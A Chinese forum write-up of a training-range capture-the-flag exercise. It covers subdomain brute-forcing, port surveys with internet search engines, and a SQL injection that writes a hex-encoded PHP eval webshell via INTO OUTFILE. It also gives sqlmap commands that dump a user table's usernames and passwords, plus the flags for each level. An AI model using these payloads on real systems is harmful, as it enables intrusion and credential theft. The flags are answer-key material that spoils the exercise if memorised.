公开课基础靶场kali篇的简单记录

weakchicken   ·   发表于 3个月前   ·   Writeup专版

公开课基础靶场之kali篇:

根据提示访问dns.txt页面,将其全部复制到一个文件中,取名为dic.txt,为下文做充分准备,或者直接添加到后面也行,不过可能花费的时间更长一些。

我使用的工具为layer子域名挖掘机,下载地址:https://www.sec.kim/archives/212.html


下面我简单介绍此工具的用法:

如果要使用自定义字典,请把字典文件命名为dic.txt,放到跟程序同目录下,程序会自动加载字典。如果要爆破二级以下域名,可以直接填入要爆破的子域名,程序会自动拼接下一级子域。比如填入hi.baidu.com,程序会爆破hi.baidu.com下面的域。

另外本软件支持泛解析识别,可以去除泛解析的域名。


于是我一顿神操作,换上字典后开始爆破,得到如下结果:

爆破结果为:

域名:8adc3387c2ed6cce.lab.aqlab.cn

IP:59.63.200.79

开放端口:81


于是乎,访问之,如下图所示:

得到flag,开心的提交了,记得把冒号之前的去掉哦,不然会提示flag不正确

flag填写如下:

flag-8adc-3387-c2ed6




当我看到题目后,四大网络空间搜索引擎fofa,zoomeye,shodan,censys.io一顿尝试:

fofa.so

fofa语法为:ip="59.63.200.79"

端口开放情况依次为:

8010,Sorry,You do this is wrong! (.-.)

8082,finecms

81,就是第一关了

8008,是这样一个图片

3389,RDP远程桌面开着,脸上流露出洋溢的笑容,其实它是个虚拟机,白高兴一场

902,vmware_authentication_daemon

443,HelloWorld;

80,302临时跳转到封神台:https://hack.zkaq.cn/

8001,豪华盛宴的一个页面,看起来真高大尚,查看源码后发现,原来是个注入的靶场,o my god!

1433,mssql服务对外开放


zoomeye

直接输入IP即可:59.63.200.79

右边有高级搜索,语法都不用,直接输入想要搜索的结果搜索就行,贼方便

端口开放情况:也是按照顺序来

8006,是这样一个图片

8001,与上类似

8020,UsualToolCMS

81,与上类似

902,与上类似

1880,一个默认的lnmp搭建成功的页面,phpinfo和探针页面依旧存在

8010,与上类似

80,与上类似

8004,某企业建站模板搭建的公司系统走一波

云悉指纹识别,如下图所示:

谷歌搜索此Southidc

扯多了,,回归端口正题

8008,与上类似

8007,猫舍靶场8003,也是猫舍靶场,看来作者对猫情有独钟啊

443,与上类似

8082,与上类似

3389,与上类似

8002,hello world

8005,和8004端口一样

钟馗之眼也搞定了,,


Censys

这个就有点扎心了,就发现四个端口,可能飘扬过海来扫描的时候丢包太严重了吧

80,443,1433,3389


shodan

80, 81, 443, 1433, 3389, 8001, 8008, 8011, 8016, 8020, 8808

8011,typecho

8016,upload labs靶场

8808,You might need input the "id" fields

至此各大网络空间搜索引擎都比较完了,各有千秋。

我得一个端口一个端口的尝试,最终8001为正确的端口,是不是该感谢下搭建靶场的老师们呢?确实是该,因为他们担负起了一个引路人的责任



第三关就是漏洞扫描了,其实就是个注入而已,直接写个shell上去,菜刀连接下按照正常思路走一波

' order by 3%23 正常

' order by 4%23 报错

说明三个字段

' union select 1,2,3%23 

回显位为2和3

根据其报错路径:

C:\phpStudy\WWW\single.php写shell时需要注意,路径要用 / 或者 \\ 否则会被当做转义字符

采用hex编码的一句话:0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e

解码出来是这样的:<?php eval($_POST['test'])?>

这个是我写的路径:C:/phpStudy/WWW/shell.php注入

payload:

' union select 11,2,0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e into outfile 'C:/phpStudy/WWW/shell.php'%23

服务器返回图:

菜刀连接:

菜刀中直接查看flag.php 提交,发现不对劲,再回去细看题目,细细品味题意,flag在某一个文本里面,我就想了,看了看第二关的格式flag:flagxxx

于是我就又翻了翻文件,我打开了robots.txt这个文件,直接右键打开,满满的惊喜,挺意外的,格式一模一样,于是直接提交,正确~bingo

flag-8adc-2230-ekd1



我菜刀列表里还有个练习的shell,大家可以看一下,可能有的人会有疑问了,这个不是lnmp的默认成功搭建页面么?为啥有shell呢?



其实我是看了看公众号文章而已,这也是个靶场,帮助大家来练习ssrf的,加深对ssrf漏洞原理的理解,顺便可以学习下老师们的骚思路。

掌控安全EDU公众号聂风老师于11月15日发的文章

巧用Gopher协议扩展SSRF攻击手法

https://mp.weixin.qq.com/s/gbkaAyzYeD7q8Fepv9mYwA



根据提示,毫不犹豫直接上sqlmap

sqlmap -u http://59.63.200.79:8001/single.php?id=1 --random-agent --dbs 使用随机ua头,爆出所有数据库

sqlmap -u http://59.63.200.79:8001/single.php?id=1 --random-agent -D cake --tables 指定cake数据库,爆出所有表

sqlmap -u http://59.63.200.79:8001/single.php?id=1 --random-agent -D cake -T user --columns 指定user表,爆出所有字段

sqlmap -u http://59.63.200.79:8001/single.php?id=1 --random-agent -D cake -T user -C passwd,username --dump 指定字段,dump出数据


提交flag即可

flag-8adc-6513-e54az



最后一关,直接用上面的菜刀的shell直接查看网站根目录下flag.txt即可

flag-8adc-3387-1561z

C盘的根目录下有彩蛋,机会总是留给有准备并且细心的人。


至此就写完了,如果有写的不好的地方,请指出并说明,如果您觉得文章写的不咋地,请勿喷,尊重他人也是对自己的一种尊重。


打赏我,让我更有动力~

1 Reply   |  Until 3个月前 | 279 View

ctf_leadsec
发表于 3个月前

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部

掌控者 © 2016. All Rights Reserved. 掌控者

Powered by 掌控者 Version 2.1.3